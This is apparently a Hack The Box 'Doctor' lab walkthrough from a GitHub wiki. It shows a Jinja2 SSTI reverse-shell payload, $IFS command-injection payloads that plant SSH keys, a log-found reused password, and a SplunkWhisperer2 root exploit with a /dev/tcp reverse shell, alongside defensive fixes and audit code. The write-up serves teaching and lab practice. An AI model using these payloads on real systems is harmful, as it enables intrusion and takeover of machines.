HTB Doctor - lmiyasato/lenny-hacking GitHub Wiki
-
nmap, recon scan.
-
Port 8089 - https://10.10.10.209:8089/ is the Splunk management interface (splunkd REST API); the default admin/changeme credentials don't work.
The service still fingerprints itself without a login: Updated: 2021-02-04T05:35:31+01:00, Splunk build: 8.0.5
Robots.txt: User-agent: * Disallow: (nothing excluded)
Directory enumeration: /robots.txt (Status: 200), /services (Status: 401), /v1 (Status: 200), /v2 (Status: 200), /v3 (Status: 200), /v4 (Status: 200)
Nothing usable here without credentials, moving along (we come back to /services once we have a Splunk login).
- Note: the main page (port 80) shows a doctors.htb email address, so add doctors.htb for 10.10.10.209 to /etc/hosts and browse the site by that name.
The page source contains a commented-out link to an archive subpage:
<!--archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a>-->
View-source on http://doctors.htb/archive shows an RSS feed whose item titles are the titles of messages posted on the main site, i.e. user input rendered server-side, which is where to test for SSTI.
After some dinking around: post a new message with a template expression as its title (for example {{7*'7'}} and {{5*'5'}}) and reload the archive source. Several probes are visible in the feed: ${7*7} came back unevaluated, {{7*7}} became 49, and {{7*'7'}} became 7777777 (string repetition, which is Python/Jinja2 behaviour; a Twig-style engine would give 49 for both).
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title>${7*7}</title></item>
<item><title>49</title></item>
<item><title>7777777</title></item>
<item><title>7777777 </title></item>
</channel>
</rss>
Now submit this as the message title to get a foothold. It walks object.__subclasses__() until it finds warnings.catch_warnings, whose instances keep the warnings module in _module; that module's __builtins__ dict holds __import__, which loads os and runs the reverse shell through popen (the .zfill(417) only pads the rendered output). Note the double underscores in __class__, __base__, __subclasses__, __name__, __builtins__ and __import__, and the escaped inner double quotes; a markdown renderer will happily eat both, so copy carefully:
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"10.10.14.52\",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
Start a listener first (nc -nvlp 443), submit the message, then visit http://doctors.htb/archive: rendering the feed evaluates the expression and the reverse shell connects back.
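The gadget chain inside that payload, as an added example in plain Python (this is not code from the writeup or from the target application): Jinja2 evaluates expressions with Python semantics, so whoever controls an expression can go from a literal tuple to object, list every loaded class, and reach a module reference from one of them. Everything below is standard CPython behaviour; the only assumption is that the warnings module is loaded, which it is in any normal interpreter.

```python
"""Why the {{ ... }} payload above reaches os.popen: the same chain in plain Python.
Added example, not code from the writeup or the target application."""
import builtins


def gadget_classes(fragment="warning"):
    """Direct subclasses of object whose name contains the fragment.
    ().__class__ is tuple, tuple.__base__ is object, and
    object.__subclasses__() lists every class the interpreter has loaded,
    which is why the payload starts from an empty tuple literal."""
    return [cls for cls in ().__class__.__base__.__subclasses__()
            if fragment in cls.__name__]


def import_via_gadget():
    """Recover __import__ without ever writing the word 'builtins'.
    warnings.catch_warnings() stores the warnings module in ._module, and a
    module's __builtins__ (outside __main__) is the builtins dict, which holds
    __import__.  Any matching class that lacks the attribute is skipped."""
    for cls in gadget_classes():
        try:
            return cls()._module.__builtins__["__import__"]
        except Exception:  # wrong class, not instantiable, no _module, etc.
            continue
    raise LookupError("no usable gadget class; is the warnings module loaded?")


def run_via_gadget(command):
    """What the template expression finally does: import os through the
    recovered __import__ and run a shell command, returning its stdout."""
    os_module = import_via_gadget()("os")
    return os_module.popen(command).read()


def gadget_is_real_import():
    """Sanity check: the recovered function is the interpreter's own __import__."""
    return import_via_gadget() is builtins.__import__


if __name__ == "__main__":
    print("gadget classes:", [c.__name__ for c in gadget_classes()])
    print(run_via_gadget("id"), end="")
```

The fix on the application side is not to render user input as a template at all: the title belongs in a variable passed to a fixed template (for a Flask app, which is the usual host for Jinja2 and an assumption here, render_template("archive.xml", posts=posts) rather than render_template_string on a string containing the title). jinja2.sandbox.SandboxedEnvironment, which refuses underscore-prefixed attribute access such as __subclasses__, is defence in depth, not a substitute.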
- Command injection (alternative foothold):
Create a post containing a link back to a web server you control. For the first test the title and content were: test title link <script>alert("test")</script>
After the post is submitted the server fetches the link itself, which shows up in the web server's log:
kali@kali:~$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.209 - - [06/Feb/2021 17:39:20] code 404, message File not found
10.10.10.209 - - [06/Feb/2021 17:39:20] "GET /title HTTP/1.1" 404 -
Change the link to: http://10.10.14.52/$(whoami) . The $(...) is expanded by the shell that runs the fetch, so the command output arrives as the request path:
kali@kali:~$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.209 - - [06/Feb/2021 17:45:01] code 404, message File not found
10.10.10.209 - - [06/Feb/2021 17:45:01] "GET /web HTTP/1.1" 404 -
change the payload to: http://10.10.14.52/$(id)
10.10.10.209 - - [06/Feb/2021 17:48:40] code 404, message File not found
10.10.10.209 - - [06/Feb/2021 17:48:40] "GET /uid=1001(web) HTTP/1.1" 404 -
More complex commands are harder because a space ends the URL; use $IFS in place of spaces (a standard injection trick: unquoted $IFS expands to the shell's whitespace characters and is then word-split, so ping$IFS-c$IFS3 runs as ping -c 3).
change the payload to:
http://10.10.14.52/$(ping$IFS-c$IFS'3'$IFS'10.10.14.52')
• three pings to your own box; confirm with tcpdump -i tun0 icmp on the attacking machine.
Create a .ssh directory for the web user with the same trick:
http://10.10.14.52/$(mkdir$IFS'/home/web/.ssh')
Append your SSH public key to /home/web/.ssh/authorized_keys the same way (echo with $IFS-separated arguments and a >> redirection inside the $(...)), then SSH in with the matching private key:
kali@kali:~/Documents/HTB/doctor$ ssh -i doctor_rsa web@10.10.10.209
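The server-side fetch behind this, as an added example (not the writeup's code; the Doctor application's own fetch routine is not shown anywhere on the page, so the vulnerable function below assumes the usual shape, a URL from the post pasted into a shell command line, and uses echo in place of the real curl/wget so it runs offline). It also builds the $IFS-style payloads used above from an argv list, so the quoting rules are applied mechanically instead of by hand.

```python
"""Vulnerable vs. hardened server-side fetch, plus a builder for $IFS payloads.
Added example; the target app's real fetch code is not on the page and is assumed
to interpolate the URL into a shell command.  echo stands in for curl/wget."""
import subprocess

ATTACKER = "http://10.10.14.52/"  # attacker host from the writeup


def vulnerable_fetch(url):
    """String-built command run through /bin/sh: any $(...) in the URL is
    expanded by the shell before the fetcher ever sees the argument."""
    result = subprocess.run("echo " + url, shell=True,
                            capture_output=True, text=True)
    return result.stdout.strip()


def hardened_fetch(url):
    """argv list, no shell: the URL is one literal argument and $(...) stays
    text.  (Validating scheme and host before fetching is a separate fix.)"""
    result = subprocess.run(["echo", url], capture_output=True, text=True)
    return result.stdout.strip()


def ifs_payload(argv):
    """Build the $(...) form used above: words joined by $IFS instead of
    spaces, every argument after the command single-quoted, so the whole
    command survives as one URL path segment.  Quoting each argument also
    keeps $IFS from running into the next word ($IFSfoo would be the
    variable IFSfoo).  A literal single quote is written as '\\''."""
    quoted = ["'" + arg.replace("'", "'\\''") + "'" for arg in argv[1:]]
    return "$(" + "$IFS".join([argv[0]] + quoted) + ")"


if __name__ == "__main__":
    probe = ATTACKER + ifs_payload(["id"])
    print("vulnerable:", vulnerable_fetch(probe))
    print("hardened:  ", hardened_fetch(probe))
    print("mkdir payload:", ifs_payload(["mkdir", "/home/web/.ssh"]))
```

The hardened version is only half the fix: a fetcher that will happily request any URL a user supplies is still an SSRF primitive, so the scheme and destination should be allow-listed before the call as well.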
- Getting to shaun
After running linpeas, this bit of /etc/crontab caught the eye. It is only the stock example comment, but it points at /var, which the web user can read:
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
Grep the logs for anything password-related:
web@doctor:/var/log$ grep -r passw . 2>/dev/null
./auth.log:Feb 7 00:21:48 doctor sudo: pam_unix(sudo:auth): auth could not identify password for [web]
./auth.log.1:Feb 6 18:33:04 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for root.
./auth.log.1:Feb 6 18:33:05 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for root.
./auth.log.1:Feb 6 18:33:05 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for root.
./auth.log.1:Feb 6 18:33:10 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for root.
./auth.log.1:Feb 6 18:33:10 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for root.
./auth.log.1:Feb 6 18:33:11 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for root.
./auth.log.1:Feb 6 18:33:18 doctor VGAuth[666]: message repeated 18 times: [ vmtoolsd: Username and password successfully validated for root.]
./apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
su shaun with Guitar123 works: someone typed the password into the email field of the reset form, the request line (query string included) was written to the Apache log, and a backup copy of that log is readable by the low-privileged web user.
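The grep worked because the credential sat in a request line. As an added example (not from the writeup), here is a small scanner for Apache access-log lines that reports query strings on authentication endpoints, which is the condition a log review should flag. The sample lines are constructed, with the first one mirroring the hit above; the endpoint list and the navigation parameters it ignores are assumptions.

```python
"""Flag query strings on authentication endpoints in Apache access logs.
Added example; sample lines are constructed for the demo."""
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed: endpoints where a query string means a credential went into the URL.
AUTH_PATHS = {"/login", "/reset_password", "/register", "/change_password"}
# Assumed: parameters that legitimately appear on those paths (navigation only).
BENIGN_PARAMS = {"next", "redirect", "token"}

# Common/combined log prefix: client ident user [time] "METHOD target [proto]" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# Constructed sample; the first line has the shape of the real hit above.
SAMPLE_LOG = """\
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
10.10.14.4 - - [05/Sep/2020:11:17:40 +2000] "GET /static/main.css HTTP/1.1" 200 1234 "-"
10.10.14.4 - - [05/Sep/2020:11:18:02 +2000] "GET /login?next=/home HTTP/1.1" 200 2048 "-"
10.10.14.4 - - [05/Sep/2020:11:18:30 +2000] "GET /login?username=alice&password=Winter2020 HTTP/1.1" 302 0 "-"
"""


def leaked_parameters(lines):
    """Return (ip, status, path, {param: value}) for each request to an auth
    endpoint whose query string carries more than navigation parameters.
    Anything in a query string ends up in access logs, proxies and Referer
    headers, so on these paths it is almost always a credential typed into
    the wrong field or a form that submits with GET."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if target.path not in AUTH_PATHS or not target.query:
            continue
        params = {k: v for k, v in parse_qsl(target.query, keep_blank_values=True)
                  if k not in BENIGN_PARAMS}
        if params:
            findings.append((m.group("ip"), int(m.group("status")),
                             target.path, params))
    return findings


if __name__ == "__main__":
    for ip, status, path, params in leaked_parameters(SAMPLE_LOG.splitlines()):
        print(f"{ip} {status} {path} {params}")
```

On the hardening side the same finding points at two fixes: never let secrets travel in a URL (POST bodies are not logged by default), and keep /var/log and log backups out of reach of the web application's user.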
- Escalation to root:
Go to https://10.10.10.209:8089/services and authenticate as shaun with the same password (Guitar123 is reused for Splunk); once authenticated the REST API exposes a lot more endpoints.
SplunkWhisperer2 will do the trick: it uses that authenticated API to install a Splunk app whose scripted input splunkd executes on the host. git clone https://github.com/cnotin/SplunkWhisperer2.git
Open a listener first (shown further down), then run SplunkWhisperer2 and take root:
kali@kali:~/Documents/HTB/doctor/splunkwhisperer/SplunkWhisperer2/PySplunkWhisperer2$ sudo python3 PySplunkWhisperer2_remote.py --username shaun --password Guitar123 --host 10.10.10.209 --port 8089 --lhost 10.10.14.52 --payload "bash -c bash -i>& /dev/tcp/10.10.14.52/667 0>&1"
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmp_mato4yx.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.52:8181/
10.10.10.209 - - [06/Feb/2021 18:43:50] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!
Press RETURN to cleanup
The listener, set up before running the script:
kali@kali:~$ sudo /usr/bin/nc -nvlp 667
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::667
Ncat: Listening on 0.0.0.0:667
Ncat: Connection from 10.10.10.209.
Ncat: Connection from 10.10.10.209:50932.
bash: cannot set terminal process group (1141): Inappropriate ioctl for device
bash: no job control in this shell
root@doctor:/# ls
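The mechanism behind that root shell, as an added example (this is neither SplunkWhisperer2's code nor anything from the writeup): a Splunk app may declare a scripted input in default/inputs.conf, and splunkd runs that script as its own user, which on Doctor is root. The block builds the minimal shape of such an app bundle in memory and inspects it the way a defender auditing app installs would; the app name, script name and interval are illustrative choices.

```python
"""Minimal shape of the app SplunkWhisperer2 installs, built in memory and
inspected.  Added example; not the tool's code and not from the writeup."""
import io
import tarfile

# Illustrative names; the real tool picks its own.
APP_NAME = "evil_app"
SCRIPT_NAME = "payload.sh"


def build_malicious_app(script_body, app_name=APP_NAME, interval=10):
    """Return a .tar holding <app>/bin/payload.sh and <app>/default/inputs.conf.
    The [script://...] stanza is a scripted input: splunkd runs the script
    every `interval` seconds as the user splunkd itself runs as."""
    inputs_conf = (
        f"[script://./bin/{SCRIPT_NAME}]\n"
        "disabled = 0\n"
        f"interval = {interval}\n"
        f"sourcetype = {app_name}\n"
    )
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path, text, mode in (
            (f"{app_name}/bin/{SCRIPT_NAME}", script_body, 0o755),
            (f"{app_name}/default/inputs.conf", inputs_conf, 0o644),
        ):
            raw = text.encode()
            info = tarfile.TarInfo(path)
            info.size = len(raw)
            info.mode = mode
            tar.addfile(info, io.BytesIO(raw))
    return buf.getvalue()


def scripted_inputs(bundle):
    """Defender's view of an app bundle: every script declared in an
    inputs.conf, with whether the file exists in the bundle and is executable.
    Reviewing this before an install (or auditing installed apps for it
    afterwards) is the detection angle for this technique."""
    with tarfile.open(fileobj=io.BytesIO(bundle), mode="r") as tar:
        members = {m.name: m for m in tar.getmembers()}
        report = {}
        for conf in [n for n in members if n.endswith("/default/inputs.conf")]:
            app_dir = conf[: -len("/default/inputs.conf")]
            text = tar.extractfile(conf).read().decode()
            for line in text.splitlines():
                if line.startswith("[script://") and line.endswith("]"):
                    rel = line[len("[script://"):-1]
                    path = app_dir + "/" + rel[2:] if rel.startswith("./") else rel
                    member = members.get(path)
                    report[rel] = {
                        "present": member is not None,
                        "executable": bool(member and member.mode & 0o111),
                    }
    return report


if __name__ == "__main__":
    blob = build_malicious_app("#!/bin/sh\nid > /tmp/whoami.txt\n")
    print(scripted_inputs(blob))
```

SplunkWhisperer2 serves a bundle like this over HTTP (the "Installing app from: http://10.10.14.52:8181/" line above) and asks splunkd, through the authenticated API, to install it from that URL; the scripted input then fires and the shell comes back as root. The fixes follow directly: run splunkd as a dedicated unprivileged user, don't reuse the web application password for the Splunk admin account, and keep 8089 off any network that untrusted hosts can reach.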